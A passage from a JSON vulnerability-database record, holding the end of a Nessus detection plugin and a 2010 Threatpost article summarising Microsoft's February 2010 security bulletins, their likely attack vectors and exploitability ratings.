(!get_kb_item(\"Settings/PCI_DSS\"))\n{\n audit(AUDIT_PCI);\n}\n\nif (report_paranoia < 2)\n{\n audit(AUDIT_PARANOID);\n}\n\nport = get_kb_item_or_exit(\"Services/smtp\");\nos_version = get_kb_item_or_exit(\"smtp/\"+port+\"/ntlm/host/os_version\");\nif (os_version != \"6.0.6001\")\n{\n audit(AUDIT_OS_SP_NOT_VULN);\n}\n\nsecurity_report_v4(severity:SECURITY_HOLE, port:port);\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:08:33", "bulletinFamily": "info", "description": "[](<https://threatpost.com/ms-patch-tuesday-13-bulletins-26-vulnerabilities-020910/>)Microsoft today released 13 security bulletins with fixes for 26 vulnerabilities affecting Windows and Office users and warned customers to pay special attention to a slew of flaws that can be trivially exploited by malware miscreants.\n\nThe company urged customers to prioritize and deploy 
four updates because of the \u201ccritical\u201d severity rating and the fact that \u201cconsistent exploit code\u201d is likely within the next 30 days.\n\nHere\u2019s the [skinny](<http://blogs.technet.com/msrc/archive/2010/02/09/february-2010-security-bulletin-release.aspx>) on the three updates that should be applied immediately: \n\n * [MS10-013](<http://www.microsoft.com/technet/security/Bulletin/MS10-013.mspx>): Addresses a Critical vulnerability in DirectShow, should be at the top of your list for testing and deployment. This issue is Critical on all supported versions of Windows except Itanium based server products and has an Exploitability Index rating of 1. To exploit the vulnerability, an attacker could host a malicious AVI file on a website and convince a user to visit the site, or send the file via email and convince the a user to open it.\n * [MS10-006](<http://www.microsoft.com/technet/security/Bulletin/MS10-006.mspx>): This is also rated Critical on all versions of Windows, except Windows Vista and Windows Server 2008, and addresses 2 vulnerabilities in SMB Client. One of the vulnerabilities has an Exploitability Index rating of 1. In the simplest scenario, a system connecting to a network file share is an SMB Client. The issue occurs during the client/server negotiation phase of the connection. In order to exploit this issue, an attacker would need to host a malicious server and convince a client system to connect to it. An attacker could also try to perform a man-in-the-middle attack by responding to SMB requests from clients. From our analysis of this issue, we expect attempts to exploit it would be more likely to result in a Denial of Service than in Remote Code Execution.\n * [MS10-007](<http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx>): Fixes a Critical vulnerability in Windows Shell Handler that affects Windows 2000, Windows XP, and Windows Server 2003. 
The attack vector is through a specially crafted link that appears to the ShellExecute API to be a valid link. This issue has not been publicly exposed but we give it an Exploitability Index rating of 1, so we urge customers on affected platforms to install it as soon as possible.\n\nA fourth bulletin \u2014 [MS10-008](<http://www.microsoft.com/technet/security/Bulletin/MS10-008.mspx>) \u2014 includes ActiveX Kill Bits for Internet Explorer and should also be treated with the utmost priority because it exposes surfers to malicious code execution attacks.\n\nEleven of 13 bulletins affect the Windows operating system while two affect older versions of Microsoft Office.\n\nThis chart from Microsoft\u2019s [Security Research & Defense Blog](<http://blogs.technet.com/srd/archive/2010/02/09/assessing-the-risk-of-the-february-security-bulletins.aspx>) provides useful information to help assess the risks associated with these vulnerabilities: \n\n**Bulletin** | \n\nMost likely attack vector\n\n| \n\nMax Bulletin Severity\n\n| \n\nMax Exploit- ability Index\n\n| \n\nLikely first 30 days impact\n\n| \n\nPlatform mitigations \n \n---|---|---|---|---|--- \n \n[MS10-013](<http://www.microsoft.com/technet/security/bulletin/MS10-013.mspx>)\n\n(Quartz)\n\n| \n\nVictim opens malicious AVI or WAV file.\n\n| \n\nCritical\n\n| \n\n1\n\n| \n\nLikely to see working exploit in next 30 days.\n\n| \n \n[MS10-007](<http://www.microsoft.com/technet/security/bulletin/MS10-007.mspx>)\n\n(ShellExecute)\n\n| \n\nAttacker hosts a malicious webpage, lures victim to it.\n\n| \n\nCritical\n\n| \n\n1\n\n| \n\nLikely to see exploit code released resulting in binary on WebDAV share being executed.\n\nFor more detail, see this [SRD blog post](<http://blogs.technet.com/srd/archive/2010/02/09/ms10-007-additional-information-and-recommendations-for-developers.aspx>).\n\n| \n \n[MS10-006](<http://www.microsoft.com/technet/security/bulletin/MS10-006.mspx>)\n\n(SMB Client)\n\n| \n\nLocally logged-in attacker 
with low privilege runs a malicious executable to elevate to high privilege.\n\n| \n\nCritical\n\n| \n\n1\n\n| \n\nLikely to see \nworking exploit code for local attacker escalation.\n\nFor more detail, see this [SRD blog post](<http://blogs.technet.com/srd/archive/2010/02/09/ms10-006-and-ms10-012-smb-security-bulletins.aspx>).\n\n| \n \n[MS10-008](<http://www.microsoft.com/technet/security/bulletin/MS10-001.mspx>)\n\n(ActiveX kill-bits)\n\n| \n\nAttackers host a malicious webpage, lures victim to it\n\n| \n\nCritical\n\n| \n\n2\n\n| \n\nLikely to see working exploit for vulnerabilities in third party ActiveX controls.\n\n| \n \n[MS10-012](<http://www.microsoft.com/technet/security/bulletin/MS10-012.mspx>)\n\n(SMB Server)\n\n| \n\nAttacker sends network-based malicious connection to remote Windows machine via SMB.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see working proof-of-concept in next 30 days for CVE-2010-0231 resulting in attacker \n \nluring remote victim user to open file on attacker server and \ninitiating a connection back to machine where remote victim is logged \non. \n\n\nLess \nlikely to see working exploit code for the authenticated code execution \nvulnerability (CVE-2010-0020) or unauthenticated denial-of-service \nvulnerabilities (CVE-2010-0021 and 0022)\n\nFor more detail, see this [SRD blog post](<http://blogs.technet.com/srd/archive/2010/02/09/ms10-006-and-ms10-012-smb-security-bulletins.aspx>).\n\n| \n \n[MS10-015](<http://www.microsoft.com/technet/security/bulletin/MS10-015.mspx>)\n\n(Kernel)\n\n| \n\nAttacker already able to execute code as low-privileged user escalates privileges.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nProof of concept code already widely available. 
No active attacks.\n\n| \n \n[MS10-011](<http://www.microsoft.com/technet/security/bulletin/MS10-011.mspx>)\n\n(CSRSS)\n\n| \n\nAttacker \nwho logs onto console of system where victim later logs onto console of \nsame system can potentially run code with victim\u2019s identity.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see \nproof-of-concept code published for this vulnerability. However, \nunlikely to see wide-spread exploitation due to extensive user \ninteraction required.\n\n| \n \n[MS10-009](<http://www.microsoft.com/technet/security/bulletin/MS10-009.mspx>)\n\n(TCP/IP)\n\n| \n\nAttacker sends network-based attack against system on local subnet.\n\n| \n\nCritical\n\n| \n\n2\n\n| \n\nMay see denial-of-service proof-of-concept \ncode published leveraging CVE-2010-0239 or CVE-2010-0241. Attackers \nare less likely to discover real-world attack surface in next 30 days \nfor CVE-2010-0240.\n\n| \n\n/GS effective mitigation for CVE\u2019s:\n\nCVE-2010-0239\n\nCVE-2010-0240\n\nCVE-2010-0241. \n\n\nCVE-2010-0242 is denial of service only. \n \n[MS10-003](<http://www.microsoft.com/technet/security/bulletin/MS10-003.mspx>)\n\n(Excel)\n\n| \n\nAttack sends malicious .xls file to victim who opens it with Office XP or lower. (Office 2003, 2007 not affected.)\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see working exploit file effective on Office XP in first 30 days.\n\n| \n\nOffice 2003 and Office 2007 not affected. \n \n[MS10-004](<http://www.microsoft.com/technet/security/bulletin/MS10-004.mspx>)\n\n(PowerPoint)\n\n| \n\nAttacks malicious .ppt file to victim who opens it with Powerpoint Viewer 2003.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see working exploit file effective \non PowerPoint Viewer 2003. However, PowerPoint Viewer 2003 was \nreplaced online by PowerPoint Viewer 2007. Only victims who use\n\n \nPowerPoint Viewer 2003 from Office 2003 install disk would be vulnerable to the PowerPoint Viewer vulnerabilities. 
\n\n\nLess likely to see working exploit for other PowerPoint vulnerabilities. \n\n\n| \n \n[MS10-010](<http://www.microsoft.com/technet/security/bulletin/MS10-010.mspx>)\n\n(Hyper-V)\n\n| \n\nAttacker running code on virtual machine crashes host OS.\n\n| \n\nImportant\n\n| \n\n3\n\n| \n\nUnlikely to see working exploit code in next 30 days.\n\n| \n \n[MS10-014](<http://www.microsoft.com/technet/security/bulletin/MS10-014.mspx>)\n\n(Kerberos)\n\n| \n\nAttacker potentially able to cause denial of service via \n \nKerberos traffic if victim server configured with trust relationship to MIT Kerberos realm.\n\n| \n\nImportant\n\n| \n\n3\n\n| \n\nUnlikely to see public exploit code \nin next 30 days.\n\n| \n \n[MS10-005](<http://www.microsoft.com/technet/security/bulletin/MS10-005.mspx>)\n\n(GDI+)\n\n| \n\nAttacker sends malicious JPEG to victim. Victim saves JPG, launches mspaint, and then file->opens the malicious JPEG\n\n| \n\nModerate\n\n| \n\n1\n\n| \n\nLikely to see exploit code developed. Unlikely to have broad impact as mspaint is not registered file association for JPEG.\n\n| \n \nMicrosoft also updated the malicious software removal tool to add detections for the Win32/Pushbot malware family.\n", "modified": "2018-08-15T13:30:13", "published": "2010-02-09T19:33:53", "id": "THREATPOST:F9D20D7B330A431D721F16F5223B236A", "href": "https://threatpost.com/ms-patch-tuesday-13-bulletins-26-vulnerabilities-020910/73517/", "type": "threatpost", "title": "MS Patch Tuesday: 13 Bulletins, 26 Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}